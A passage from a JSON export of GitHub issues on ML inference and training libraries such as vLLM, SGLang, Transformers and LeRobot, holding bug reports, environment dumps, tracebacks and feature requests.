(Ubuntu 13.3.0-6ubuntu2~24.04) 13.3.0\nClang version : Could not collect\nCMake version : Could not collect\nLibc version : glibc-2.39\n\n==============================\n PyTorch Info\n==============================\nPyTorch version : 2.9.0+cu128\nIs debug build : False\nCUDA used to build PyTorch : 12.8\nROCM used to build PyTorch : N/A\n\n==============================\n Python Environment\n==============================\nPython version : 3.12.3 (main, Nov 6 2025, 13:44:16) [GCC 13.3.0] (64-bit runtime)\nPython platform : Linux-6.8.0-87-generic-x86_64-with-glibc2.39\n\n==============================\n CUDA / GPU Info\n==============================\nIs CUDA available : True\nCUDA runtime version : 13.0.88\nCUDA_MODULE_LOADING set to : \nGPU models and configuration : \nGPU 0: NVIDIA B200\nGPU 1: NVIDIA B200\nGPU 2: NVIDIA B200\nGPU 3: NVIDIA B200\nGPU 4: NVIDIA B200\nGPU 5: NVIDIA B200\nGPU 6: NVIDIA B200\nGPU 7: NVIDIA B200\n\nNvidia driver version : 580.95.05\ncuDNN version : Probably one of the following:\n/usr/lib/x86_64-linux-gnu/libcudnn.so.9.14.0\n/usr/lib/x86_64-linux-gnu/libcudnn_adv.so.9.14.0\n/usr/lib/x86_64-linux-gnu/libcudnn_cnn.so.9.14.0\n/usr/lib/x86_64-linux-gnu/libcudnn_engines_precompiled.so.9.14.0\n/usr/lib/x86_64-linux-gnu/libcudnn_engines_runtime_compiled.so.9.14.0\n/usr/lib/x86_64-linux-gnu/libcudnn_graph.so.9.14.0\n/usr/lib/x86_64-linux-gnu/libcudnn_heuristic.so.9.14.0\n/usr/lib/x86_64-linux-gnu/libcudnn_ops.so.9.14.0\nHIP runtime version : N/A\nMIOpen runtime version : N/A\nIs XNNPACK available : True\n\n==============================\n CPU Info\n==============================\nArchitecture: x86_64\nCPU op-mode(s): 32-bit, 64-bit\nAddress sizes: 52 bits physical, 57 bits virtual\nByte Order: Little Endian\nCPU(s): 240\nOn-line CPU(s) list: 0-239\nVendor ID: AuthenticAMD\nBIOS Vendor ID: QEMU\nModel name: AMD EPYC 9575F 64-Core Processor\nBIOS Model name: pc-q35-8.2 CPU @ 2.0GHz\nBIOS CPU family: 1\nCPU family: 26\nModel: 2\nThread(s) per core: 1\nCore(s) per socket: 1\nSocket(s): 240\nStepping: 1\nBogoMIPS: 6590.10\nFlags: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 syscall nx mmxext fxsr_opt pdpe1gb rdtscp lm rep_good nopl cpuid extd_apicid tsc_known_freq pni pclmulqdq ssse3 fma cx16 pcid sse4_1 sse4_2 x2apic movbe popcnt tsc_deadline_timer aes xsave avx f16c rdrand hypervisor lahf_lm cmp_legacy svm cr8_legacy abm sse4a misalignsse 3dnowprefetch osvw perfctr_core ssbd ibrs ibpb stibp ibrs_enhanced vmmcall fsgsbase tsc_adjust bmi1 avx2 smep bmi2 erms invpcid avx512f avx512dq rdseed adx smap avx512ifma clflushopt clwb avx512cd sha_ni avx512bw avx512vl xsaveopt xsavec xgetbv1 xsaves avx_vnni avx512_bf16 clzero xsaveerptr wbnoinvd arat npt lbrv nrip_save tsc_scale vmcb_clean flushbyasid pausefilter pfthreshold v_vmsave_vmload vgif vnmi avx512vbmi umip pku ospke avx512_vbmi2 gfni vaes vpclmulqdq avx512_vnni avx512_bitalg avx512_vpopcntdq la57 rdpid movdiri movdir64b fsrm avx512_vp2intersect flush_l1d arch_capabilities\nVirtualization: AMD-V\nHypervisor vendor: KVM\nVirtualization type: full\nL1d cache: 15 MiB (240 instances)\nL1i cache: 15 MiB (240 instances)\nL2 cache: ", "url": "https://github.com/vllm-project/vllm/issues/31272", "state": "open", "labels": [ "performance" ], "created_at": "2025-12-24T09:48:01Z", "updated_at": "2025-12-24T10:09:29Z", "comments": 0, "user": "evgeniiperepelkin" }, { "repo": "huggingface/trl", "number": 4747, "title": "Addition of Supervised Reinforcement Learning", "body": "### Feature request\n\nhttps://arxiv.org/pdf/2510.25992 can i work on its implementation ?\n\n### Motivation\n\nBetter approach then previous RL's\n\n### Your contribution\n\nI can work on it following reference paper ", "url": "https://github.com/huggingface/trl/issues/4747", "state": "open", "labels": [], "created_at": "2025-12-24T09:20:32Z", "updated_at": "2025-12-24T09:20:32Z", "comments": 0, "user": "kushalgarg101" }, { "repo": "vllm-project/vllm", "number": 31270, "title": "[Bug]: Can run Speculative decode with PP >2?", "body": "### Your current environment\n\nvllm:0.12.0\n\n### \ud83d\udc1b Describe the bug\n\nI run vllm:0.12.0 with start args like this: \n`python3 -m vllm.entrypoints.openai.api_server \\\n--host 0.0.0.0 --port 8080 --dtype bfloat16 --model /Qwen3-32B \\\n--pipeline-parallel-size 2 \\\n--gpu-memory-utilization 0.9 --max-model-len 32768 --max-num-batched-tokens 5120 \\\n--trust-remote-code --no-enable-prefix-caching \\\n--speculative_config '{\"method\": \"ngram\",\"num_speculative_tokens\": 10,\"prompt_lookup_max\": 4, \"enforce_eager\": \"True\"}'`\nThe server can start, but when use the interface of '/chat/completion', the vllm server will crash.\n\n### Before submitting a new issue...\n\n- [ ] #31271", "url": "https://github.com/vllm-project/vllm/issues/31270", "state": "open", "labels": [ "bug" ], "created_at": "2025-12-24T09:10:05Z", "updated_at": "2025-12-26T07:27:11Z", "comments": 1, "user": "frankie-ys" }, { "repo": "sgl-project/sglang", "number": 15739, "title": "[Bug] Failed to deploy DeepSeek-V3.2 with LMCache", "body": "### Checklist\n\n- [x] I searched related issues but found no solution.\n- [x] The bug persists in the latest version.\n- [x] Issues without environment info and a minimal reproducible demo are hard to resolve and may receive no feedback.\n- [x] If this is not a bug report but a general question, please start a discussion at https://github.com/sgl-project/sglang/discussions. Otherwise, it will be closed.\n- [x] Please use English. Otherwise, it will be closed.\n\n### Describe the bug\n\nI use v0.5.6.post2 with LMCache 0.3.10 to deploy DeepSeek-V3.2.\nI got the following error :\n```\n[2025-12-24 08:20:12 PP0 TP2 EP2] Scheduler hit an exception: Traceback (most recent call last):\n File \"/sgl-workspace/sglang/python/sglang/srt/managers/scheduler.py\", line 2680, in run_scheduler_process\n scheduler = Scheduler(\n ^^^^^^^^^^\n File \"/sgl-workspace/sglang/python/sglang/srt/managers/scheduler.py\", line 434, in __init__\n self.init_cache_with_memory_pool()\n File \"/sgl-workspace/sglang/python/sglang/srt/managers/scheduler.py\", line 781, in init_cache_with_memory_pool\n self.tree_cache = LMCRadixCache(\n ^^^^^^^^^^^^^^\n File \"/sgl-workspace/sglang/python/sglang/srt/mem_cache/storage/lmcache/lmc_radix_cache.py\", line 91, in __init__\n getattr(self.token_to_kv_pool_allocator._kvcache, \"k_buffer\"),\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\nAttributeError: 'NSATokenToKVPool' object has no attribute 'k_buffer'. Did you mean: 'kv_buffer'?\n```\n\nIs there anything wrong with my configuration? Please advise.\nThanks~\n\n### Reproduction\n\nMy configs:\n\n> lmcache_config.yaml\n```\nchunk_size: 256\n\nlocal_cpu: true\nmax_local_cpu_size: 5.0\n#\nremote_url: \"redis://10.62.207.53:32628\"\nremote_serde: \"naive\"\n```\n\n> master.sh\n```\nexport LMCACHE_CONFIG_PATH=/mnt/scripts/lmcache_config.yaml \nexport LMCACHE_ENABLE=True\npython -m sglang.launch_server \\\n --model-path=/mnt/models/deepseek-ai/DeepSeek-V3.2 \\\n --served-model-name=deepseek-ai/DeepSeek-V3.2 \\\n --tensor-parallel-size=4 \\\n --pipeline-parallel-size=2 \\\n --expert-parallel-size=4 \\\n --data-parallel-size=1 \\\n --enable-dp-attention \\\n --trust-remote-code \\\n --mem-fraction-static=0.8 \\\n --log-requests \\\n --log-requests-level=3 \\\n --dist-init-addr=\"${MASTER_IP}:${PORT}\" \\\n --nnodes=\"$NNODES\" \\\n --node-rank=\"$NODE_RANK\" \\\n --tool-call-parser=deepseekv32 \\\n --reasoning-parser=deepseek-v3 \\\n --host=0.0.0.0 \\\n --port=8000 \\\n --enable-lmcache \\\n --enable-metrics\n```\n\n> worker.sh\n```\nexport LMCACHE_CONFIG_PATH=/mnt/scripts/lmcache_config.yaml \nexport LMCACHE_ENABLE=True\npython -m sglang.launch_server \\\n --model-path=/mnt/models/deepseek-ai/DeepSeek-V3.2 \\\n --served-model-name=deepseek-ai/DeepSeek-V3.2 \\\n --tensor-parallel-size=4 \\\n --pipeline-parallel-size=2 \\\n --expert-parallel-size=4 \\\n --data-parallel-size=1 \\\n --enable-dp-attention \\\n --trust-remote-code \\\n --mem-fraction-static=0.8 \\\n --log-requests \\\n --log-requests-level=3 \\\n --dist-init-addr=\"${MASTER_IP}:${PORT}\" \\\n --nnodes=\"$NNODES\" \\\n --node-rank=\"$NODE_RANK\" \\\n --tool-call-parser=deepseekv32 \\\n --reasoning-parser=deepseek-v3 \\\n --enable-lmcache \\\n --enable-metrics\n```\n\n### Environment\n\nsglang: v0.5.6.post2 \nlmcache: v0.3.10 \nmodel: DeepSeek-V3.2", "url": "https://github.com/sgl-project/sglang/issues/15739", "state": "open", "labels": [], "created_at": "2025-12-24T08:45:29Z", "updated_at": "2025-12-29T22:55:27Z", "comments": 1, "user": "niceallen" }, { "repo": "sgl-project/sglang", "number": 15710, "title": "[Bug] Using TBO, but no overlap in decoding phase?", "body": "### Checklist\n\n- [x] I searched related issues but found no solution.\n- [x] The bug persists in the latest version.\n- [x] Issues without environment info and a minimal reproducible demo are hard to resolve and may receive no feedback.\n- [x] If this is not a bug report but a general question, please start a discussion at https://github.com/sgl-project/sglang/discussions. Otherwise, it will be closed.\n- [x] Please use English. Otherwise, it will be closed.\n\n### Describe the bug\n\n\n\n### Reproduction\n\npython -m sglang.launch_server --model-path /root/temp_can/DeepSeek-V3-0324 --load-format dummy --tp 4 --ep 4 --moe-a2a-backend deepep --deepep-mode auto --chunked-prefill-size -1 --host 0.0.0.0 --port 30000 --enable-two-batch-overlap --mem-fraction-static 0.4\n\npython3 -m sglang.bench_one_batch_server --model-path /root/temp_can/DeepSeek-V3-0324 --base-url http://127.0.0.1:30000 --batch-size 256 --input-len 64 --output-len 128 --skip-warmup --profile\n\n### Environment\n\n(new_py310) root@zyhuang0-0:~/temp_can/sglang# python3 -m sglang.check_env\nPython: 3.10.19 (main, Oct 21 2025, 16:43:05) [GCC 11.2.0]\nCUDA available: True\nGPU 0,1: NVIDIA H100 80GB HBM3\nGPU 0,1 Compute Capability: 9.0\nCUDA_HOME: /usr/local/cuda\nNVCC: Cuda compilation tools, release 12.9, V12.9.41\nCUDA Driver Version: 550.54.15\nPyTorch: 2.9.1+cu128\nsglang: 0.5.6.post2\nsgl_kernel: 0.3.19\nflashinfer_python: 0.5.3\nflashinfer_cubin: 0.5.3\nflashinfer_jit_cache: Module Not Found\ntriton: 3.5.1\ntransformers: 4.57.1\ntorchao: 0.9.0\nnumpy: 2.2.6\naiohttp: 3.13.2\nfastapi: 0.127.0\nhf_transfer: 0.1.9\nhuggingface_hub: 0.36.0\ninteregular: 0.3.3\nmodelscope: 1.33.0\norjson: 3.11.5\noutlines: 0.1.11\npackaging: 25.0\npsutil: 7.1.3\npydantic: 2.12.5\npython-multipart: 0.0.21\npyzmq: 27.1.0\nuvicorn: 0.40.0\nuvloop: 0.22.1\nvllm: Module Not Found\nxgrammar: 0.1.27\nopenai: 2.6.1\ntiktoken: 0.12.0\nanthropic: 0.75.0\nlitellm: Module Not Found\ndecord2: 3.0.0\nNVIDIA Topology: \n GPU0 GPU1 NIC0 NIC1 NIC2 NIC3 NIC4 NIC5 NIC6 CPU Affinity NUMA Affinity GPU NUMA ID\nGPU0 X NV18 SYS PIX SYS SYS SYS SYS SYS 0-47,96-143 0 N/A\nGPU1 NV18 X SYS SYS SYS SYS SYS PIX SYS 48-95,144-191 1 N/A\nNIC0 SYS SYS X SYS SYS SYS SYS SYS SYS\nNIC1 PIX SYS SYS X SYS SYS SYS SYS SYS\nNIC2 SYS SYS SYS SYS X PXB PXB SYS SYS\nNIC3 SYS SYS SYS SYS PXB X PIX SYS SYS\nNIC4 SYS SYS SYS SYS PXB PIX X SYS SYS\nNIC5 SYS PIX SYS SYS SYS SYS SYS X SYS\nNIC6 SYS SYS SYS SYS SYS SYS SYS SYS X \n\nLegend:\n\n X = Self\n SYS = Connection traversing PCIe as well as the SMP interconnect between NUMA nodes (e.g., QPI/UPI)\n NODE = Connection traversing PCIe as well as the interconnect between PCIe Host Bridges within a NUMA node\n PHB = Connection traversing PCIe as well as a PCIe Host Bridge (typically the CPU)\n PXB = Connection traversing multiple PCIe bridges (without traversing the PCIe Host Bridge)\n PIX = Connection traversing at most a single PCIe bridge\n NV# = Connection traversing a bonded set of # NVLinks\n\nNIC Legend:\n\n NIC0: mlx5_0\n NIC1: mlx5_1\n NIC2: mlx5_2\n NIC3: mlx5_3\n NIC4: mlx5_4\n NIC5: mlx5_5\n NIC6: mlx5_6\n\n\nulimit soft: 1048576", "url": "https://github.com/sgl-project/sglang/issues/15710", "state": "open", "labels": [], "created_at": "2025-12-24T02:22:19Z", "updated_at": "2025-12-24T02:22:19Z", "comments": 0, "user": "ziyuhuang123" }, { "repo": "sgl-project/sglang", "number": 15707, "title": "[Feature] diffusion: TurboDiffusion achieves a 200x speedup on a single GPU, bringing video into the second-level era", "body": "### Checklist\n\n- [ ] If this is not a feature request but a general question, please start a discussion at https://github.com/sgl-project/sglang/discussions. Otherwise, it will be closed.\n- [ ] Please use English. Otherwise, it will be closed.\n\n### Motivation\n\nhttps://github.com/thu-ml/TurboDiffusion\n\nWhen can it be integrated into sglang-diffusion ?\n\n> [\u6e05\u534e\u7cfb DeepSeek \u65f6\u523b\u6765\u4e86\uff0c\u7845\u8c37\u6cb8\u817e\uff01\u5355\u5361 200 \u500d\u52a0\u901f\uff0c\u89c6\u9891\u8fdb\u5165\u79d2\u7ea7\u65f6\u4ee3](https://mp.weixin.qq.com/s/JmHwMsCYr9M39JLy1jAb7A)\n\n### Related resources\n\n_No response_", "url": "https://github.com/sgl-project/sglang/issues/15707", "state": "open", "labels": [], "created_at": "2025-12-24T01:50:02Z", "updated_at": "2025-12-30T08:45:43Z", "comments": 1, "user": "xiaolin8" }, { "repo": "huggingface/transformers", "number": 43023, "title": "How to investigate \"CAS service error\" during model downloading?", "body": "### System Info\n\n\n(nm) PS C:\\Users\\myuser\\AppData\\Local\\anaconda3\\envs\\nm\\Lib\\site-packages\\transformers\\commands> python .\\transformers_cli.py env\n\n```\nCopy-and-paste the text below in your GitHub issue and FILL OUT the two last points.\n\n- `transformers` version: 4.57.3\n- Platform: Windows-10-10.0.19045-SP0\n- Python version: 3.10.19\n- Huggingface_hub version: 0.36.0\n- Safetensors version: 0.7.0\n- Accelerate version: not installed\n- Accelerate config: not found\n- DeepSpeed version: not installed\n- PyTorch version (accelerator?): 2.7.0 (NA)\n- Tensorflow version (GPU?): not installed (NA)\n- Flax version (CPU?/GPU?/TPU?): not installed (NA)\n- Jax version: not installed\n- JaxLib version: not installed\n- Using distributed or parallel set-up in script?: the whole code posted below\n```\n\n### Who can help?\n\n_No response_\n\n### Information\n\n- [ ] The official example scripts\n- [x] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\nBase example from [here](https://huggingface.co/cross-encoder/ms-marco-MiniLM-L6-v2) \n\n```\nfrom transformers import AutoTokenizer, AutoModelForSequenceClassification\nimport torch\n\nmodel = AutoModelForSequenceClassification.from_pretrained('cross-encoder/ms-marco-MiniLM-L6-v2')\ntokenizer = AutoTokenizer.from_pretrained('cross-encoder/ms-marco-MiniLM-L6-v2')\n\nfeatures = tokenizer(['How many people live in Berlin?', 'How many people live in Berlin?'], ['Berlin has a population of 3,520,031 registered inhabitants in an area of 891.82 square kilometers.', 'New York City is famous for the Metropolitan Museum of Art.'], padding=True, truncation=True, return_tensors=\"pt\")\n\nmodel.eval()\nwith torch.no_grad():\n scores = model(**features).logits\n print(scores)\n```\n\nreturns\n\n```\nmodel.safetensors:\u2007\u2007\u20070%\n\u20070.00/90.9M\u2007[00:32 [1037](file:///C:/Users/myuser\t/AppData/Local/anaconda3/envs/nm/lib/site-packages/transformers/modeling_utils.py:1037) resolved_archive_file = cached_file(pretrained_model_name_or_path, filename, **cached_file_kwargs)\n 1039 # Since we set _raise_exceptions_for_missing_entries=False, we don't get an exception but a None\n 1040 # result when internet is up, the repo and revision exist, but the file does not.\n\nFile c:\\Users\\myuser\\AppData\\Local\\anaconda3\\envs\\nm\\lib\\site-packages\\transformers\\utils\\hub.py:322, in cached_file(path_or_repo_id, filename, **kwargs)\n 269 \"\"\"\n 270 Tries to locate a file in a local folder and repo, downloads and cache it if necessary.\n 271 \n (...)\n 320 ```\n 321 \"\"\"\n--> [322](file:///C:/Users/myuser\t/AppData/Local/anaconda3/envs/nm/lib/site-packages/transformers/utils/hub.py:322) file = cached_files(path_or_repo_id=path_or_repo_id, filenames=[filename], **kwargs)\n 323 file = file[0] if file is not None else file\n\nFile c:\\Users\\myuser\\AppData\\Local\\anaconda3\\envs\\nm\\lib\\site-packages\\transformers\\utils\\hub.py:567, in cached_files(path_or_repo_id, filenames, cache_dir, force_download, resume_download, proxies, token, revision, local_files_only, subfolder, repo_type, user_agent, _raise_exceptions_for_gated_repo, _raise_exceptions_for_missing_entries, _raise_exceptions_for_connection_errors, _commit_hash, **deprecated_kwargs)\n 566 elif not isinstance(e, EntryNotFoundError):\n--> [567](file:///C:/Users/myuser\t/AppData/Local/anaconda3/envs/nm/lib/site-packages/transformers/utils/hub.py:567) raise e\n 569 resolved_files = [\n 570 _get_cache_file_to_return(path_or_repo_id, filename, cache_dir, revision) for filename in full_filenames\n 571 ]\n\nFile c:\\Users\\myuser\\AppData\\Local\\anaconda3\\envs\\nm\\lib\\site-packages\\transformers\\utils\\hub.py:479, in cached_files(path_or_repo_id, filenames, cache_dir, force_download, resume_download, proxies, token, revision, local_files_only, subfolder, repo_type, user_agent, _raise_exceptions_for_gated_repo, _raise_exceptions_for_missing_entries, _raise_exceptions_for_connection_errors, _commit_hash, **deprecated_kwargs)\n 477 if len(full_filenames) == 1:\n 478 # This is slightly better for only 1 file\n--> [479](file:///C:/Users/myuser\t/AppData/Local/anaconda3/envs/nm/lib/site-packages/transformers/utils/hub.py:479) hf_hub_download", "url": "https://github.com/huggingface/transformers/issues/43023", "state": "open", "labels": [ "bug" ], "created_at": "2025-12-23T14:48:51Z", "updated_at": "2025-12-25T14:36:42Z", "user": "satyrmipt" }, { "repo": "vllm-project/vllm", "number": 31217, "title": "[Usage]: suffix decoding", "body": "### Your current environment\n\nDoes suffix decoding necessarily require a repetition penalty of 1?\n\n### How would you like to use vllm\n\nDoes suffix decoding necessarily require a repetition penalty of 1?\nIn suffix decoding, I found that when the repetition penalty is not equal to 1, the acceleration is not significant. However, when the repetition penalty is equal to 1, the acceleration is very noticeable.\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/31217", "state": "open", "labels": [ "usage" ], "created_at": "2025-12-23T10:43:45Z", "updated_at": "2025-12-24T02:56:35Z", "comments": 1, "user": "jiangix-paper" }, { "repo": "huggingface/lerobot", "number": 2707, "title": "Transformers dependency", "body": "### Ticket Type\n\n\ud83d\udc1b Bug Report (Something isn't working)\n\n### Environment & System Info\n\n```Shell\n- lerobot version: 0.4.3\n- Platform: Linux-5.14.0-570.26.1.el9_6.x86_64-x86_64-with-glibc2.34\n- Python version: 3.12.12\n- Huggingface Hub version: 0.35.3\n- Datasets version: 4.1.1\n- Numpy version: 2.3.5\n- PyTorch version: 2.7.1\n- Is PyTorch built with CUDA support?: False\n- Cuda version: N/A\n- GPU model: N/A\n- Using GPU in script?: \n```\n\n### Description\n\nHi, \n\nSince commit f04958527e70cac3aa95265badd97b53f3ef7633 and the dependency bump of transformers from 4.53 to 4.57, some extras are conflicting (pi that requires a custom 4.53 and almost all others that requires >=4.57), so I can't upgrade. Was the bump really necessary ? Or is there a possibility to get rid of the custom openpi transformers ?\n\n### Context & Reproduction\n\n[pypi-dependencies]\nlerobot = {git = \"https://github.com/huggingface/lerobot.git\", extras = [\"smolvla\", \"pi\", \"groot\"]}\n\npixi install\n\n### Relevant logs or stack trace\n\n```Shell\n\n```\n\n### Checklist\n\n- [x] I have searched existing tickets to ensure this isn't a duplicate.\n- [x] I am using the latest version of the `main` branch.\n- [x] I have verified this is not an environment-specific problem.\n\n### Additional Info / Workarounds\n\n_No response_", "url": "https://github.com/huggingface/lerobot/issues/2707", "state": "closed", "labels": [ "bug", "question", "dependencies" ], "created_at": "2025-12-23T10:37:53Z", "updated_at": "2025-12-23T23:43:10Z", "user": "RomDeffayet" }, { "repo": "vllm-project/vllm", "number": 31216, "title": "[RFC]: Sampling Optimization: move gather of logits after argmax.", "body": "### Motivation.\n\nAs shown in the left part of the following picture, in the original sampling procedure we perform `llm_head` and `gather` first, then perform `argmax` to full `logits`. However, we can in fact move `gather` after `argmax` to reduce both the communication volume of `gather` and the computation load of `argmax`.\n\n\"Image\"\n\nThe test results during the puncturing phase show that this feature can optimize the `logits_processor + sampler` time consumption by more than 200 us in certain scenarios. In speculative decoding scenarios, where multiple rounds of post-processing are required for each step, the benefits of this feature can become even more pronounced. So I think this is an important optimization especially when eagle3 become more and more popular. Later I will propose a PR to implement this.\n\n### Proposed Change.\n\n1. Remove the `gather/all_gather` operation from logits processor.\n2. Add two `gather/all_gather` operations to sampler to gather both max value and max index of `argmax`. Then perform `max` to obtain the global max value and related max index.\n\n### Feedback Period.\n\n_No response_\n\n### CC List.\n\n@youkaichao @zhuohan123 @WoosukKwon\n\n### Any Other Things.\n\n_No response_\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/31216", "state": "open", "labels": [ "RFC" ], "created_at": "2025-12-23T10:23:34Z", "updated_at": "2025-12-26T03:33:04Z", "comments": 2, "user": "whx-sjtu" }, { "repo": "huggingface/diffusers", "number": 12884, "title": "Compatibility issues regarding checkpoint/VAE dependency conflicts when Diffusers load Civitai LoRA", "body": "Hello everyone, I'm currently learning to use diffusers and would like to ask all my friends a question. I saw a good lora on Civitai, but this lora has requirements for checkpoint and vea. So I downloaded both models as the author requested. However, when I ran the following code, an error occurred.\nThe specific code is as follows:\n~~~python\npipeline = StableDiffusionPipeline.from_single_file(\n r\"E:\\Project_draw\\Models\\vae\\clearvaeSD15_v23.safetensors\",\n use_safetensors=True,\n torch_dtype=torch.float16,\n safety_checker=None\n )\n~~~\nThe errors are as follows:\n\n\"Image\"\n\nI checked the documentation of diffusers. The documentation mentioned that it is possible to load the model in this way, but I don't know why an error occurred. I saw many convert scripts in the script folder of diffusers, but I don't know which one is the corresponding conversion script and what the requirements are. If there are any friends who know how to solve it, could you please tell me what it feels like", "url": "https://github.com/huggingface/diffusers/issues/12884", "state": "closed", "labels": [], "created_at": "2025-12-23T10:11:27Z", "updated_at": "2025-12-23T13:41:47Z", "comments": 1, "user": "hhhFuture" }, { "repo": "vllm-project/vllm", "number": 31211, "title": "[Doc]: Add missing GPT-OSS tool calling instructions", "body": "### \ud83d\udcda The doc issue\n\nCurrently the `openai` tool calling format is not documented in [the tool calling documentation](https://docs.vllm.ai/en/stable/features/tool_calling/). However it is documented in the [cookbook](https://docs.vllm.ai/projects/recipes/en/latest/OpenAI/GPT-OSS.html#tool-use)\n\n### Suggest a potential alternative/fix\n\nIt would make sense to list the `openai` format alongside the other formats\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/31211", "state": "closed", "labels": [ "documentation" ], "created_at": "2025-12-23T08:35:09Z", "updated_at": "2025-12-25T05:29:11Z", "comments": 0, "user": "amithkk" }, { "repo": "huggingface/lerobot", "number": 2704, "title": "Training XVLA: IndexError with auto mode; size mismatch with joint mode on 14D joint-action dataset", "body": "### Ticket Type\n\n\ud83d\udc1b Bug Report (Something isn't working)\n\n### Environment & System Info\n\n```Shell\n\n```\n\n### Description\n\nI am trying to train XVLA with base and folding checkpoint on a 14D joint-action dataset.\nWhen I set --policy.action_mode=auto\nlerobot-train \\\n --dataset.repo_id= \\\n --output_dir=./outputs/xvla_bimanual \\\n --job_name=xvla_training \\\n --policy.dtype=bfloat16 \\\n --steps=3000 \\\n --policy.device=cuda \\\n --policy.action_mode=auto \\\n --policy.max_action_dim=20 \\\n --policy.repo_id= \\\n --policy.path=\"lerobot/xvla-base\" \\\n --policy.freeze_vision_encoder=false \\\n --policy.freeze_language_encoder=false \\\n --policy.train_policy_transformer=true \\\n --policy.train_soft_prompts=true \\\n --rename_map='{\n \"observation.images.top\": \"observation.images.image\",\n \"observation.images.right\": \"observation.images.image2\",\n \"observation.images.left\": \"observation.images.empty_camera_0\"\n}'\nI've got this error:\n\nNFO 2025-12-23 06:44:14 ot_train.py:310 Output dir: outputs/xvla_bimanual\nINFO 2025-12-23 06:44:14 ot_train.py:317 cfg.steps=3000 (3K)\nINFO 2025-12-23 06:44:14 ot_train.py:318 dataset.num_frames=1724070 (2M)\nINFO 2025-12-23 06:44:14 ot_train.py:319 dataset.num_episodes=1613\nINFO 2025-12-23 06:44:14 ot_train.py:322 Effective batch size: 8 x 1 = 8\nINFO 2025-12-23 06:44:14 ot_train.py:323 num_learnable_params=879482456 (879M)\nINFO 2025-12-23 06:44:14 ot_train.py:324 num_total_params=879482456 (879M)\nINFO 2025-12-23 06:44:14 ot_train.py:380 Start offline training on a fixed dataset, with effective batch size: 8\nTraceback (most recent call last):\n File \"/lambda/nfs/XVLA/X-VLA/.venv/bin/lerobot-train\", line 8, in \n sys.exit(main())\n File \"/lambda/nfs/XVLA/lerobot/src/lerobot/scripts/lerobot_train.py\", line 516, in main\n train()\n File \"/lambda/nfs/XVLA/lerobot/src/lerobot/configs/parser.py\", line 233, in wrapper_inner\n response = fn(cfg, *args, **kwargs)\n File \"/lambda/nfs/XVLA/lerobot/src/lerobot/scripts/lerobot_train.py\", line 386, in train\n batch = next(dl_iter)\n File \"/lambda/nfs/XVLA/lerobot/src/lerobot/datasets/utils.py\", line 912, in cycle\n yield next(iterator)\n File \"/lambda/nfs/XVLA/X-VLA/.venv/lib/python3.10/site-packages/accelerate/data_loader.py\", line 579, in __iter__\n next_batch = next(dataloader_iter)\n File \"/lambda/nfs/XVLA/X-VLA/.venv/lib/python3.10/site-packages/torch/utils/data/dataloader.py\", line 733, in __next__\n data = self._next_data()\n File \"/lambda/nfs/XVLA/X-VLA/.venv/lib/python3.10/site-packages/torch/utils/data/dataloader.py\", line 1515, in _next_data\n return self._process_data(data, worker_id)\n File \"/lambda/nfs/XVLA/X-VLA/.venv/lib/python3.10/site-packages/torch/utils/data/dataloader.py\", line 1550, in _process_data\n data.reraise()\n File \"/lambda/nfs/XVLA/X-VLA/.venv/lib/python3.10/site-packages/torch/_utils.py\", line 750, in reraise\n raise exception\nIndexError: Caught IndexError in DataLoader worker process 2.\nOriginal Traceback (most recent call last):\n File \"/lambda/nfs/XVLA/X-VLA/.venv/lib/python3.10/site-packages/torch/utils/data/_utils/worker.py\", line 349, in _worker_loop\n data = fetcher.fetch(index) # type: ignore[possibly-undefined]\n File \"/lambda/nfs/XVLA/X-VLA/.venv/lib/python3.10/site-packages/torch/utils/data/_utils/fetch.py\", line 52, in fetch\n data = [self.dataset[idx] for idx in possibly_batched_index]\n File \"/lambda/nfs/XVLA/X-VLA/.venv/lib/python3.10/site-packages/torch/utils/data/_utils/fetch.py\", line 52, in \n data = [self.dataset[idx] for idx in possibly_batched_index]\n File \"/lambda/nfs/XVLA/lerobot/src/lerobot/datasets/lerobot_dataset.py\", line 1028, in __getitem__\n item = self.hf_dataset[idx]\n File \"/lambda/nfs/XVLA/X-VLA/.venv/lib/python3.10/site-packages/datasets/arrow_dataset.py\", line 2862, in __getitem__\n return self._getitem(key)\n File \"/lambda/nfs/XVLA/X-VLA/.venv/lib/python3.10/site-packages/datasets/arrow_dataset.py\", line 2843, in _getitem\n pa_subtable = query_table(self._data, key, indices=self._indices)\n File \"/lambda/nfs/XVLA/X-VLA/.venv/lib/python3.10/site-packages/datasets/formatting/formatting.py\", line 612, in query_table\n _check_valid_index_key(key, size)\n File \"/lambda/nfs/XVLA/X-VLA/.venv/lib/python3.10/site-packages/datasets/formatting/formatting.py\", line 552, in _check_valid_index_key\n raise IndexError(f\"Invalid key: {key} is out of bounds for size {size}\")\nIndexError: Invalid key: 1723717 is out of bounds for size 1708592\n\nWhen --policy.action_mode=joint, remove --policy.max_action_dim=20, I've this error:\n\nINFO 2025-12-23 07:14:31 ot_train.py:195 Logs will be saved locally.\nINFO 2025-12-23 07:14:31 ot_train.py:207 Creating dataset\nINFO 2025-12-23 07:14:32 ot_train.py:226 Creating policy\nFlorence2ForConditionalGeneration has generative capabilities, as `prepare_inputs_for_generation` is explicitly defined. However, it doesn't directly inherit from `GenerationMixin`. From \ud83d\udc49v4.50\ud83d\udc48 onwards, `PreTrainedModel` will NOT inherit from `Gen", "url": "https://github.com/huggingface/lerobot/issues/2704", "state": "closed", "labels": [ "bug", "documentation", "question", "policies", "dataset", "CI", "examples", "training" ], "created_at": "2025-12-23T07:20:25Z", "updated_at": "2025-12-23T08:54:21Z", "user": "DaKhanh" }, { 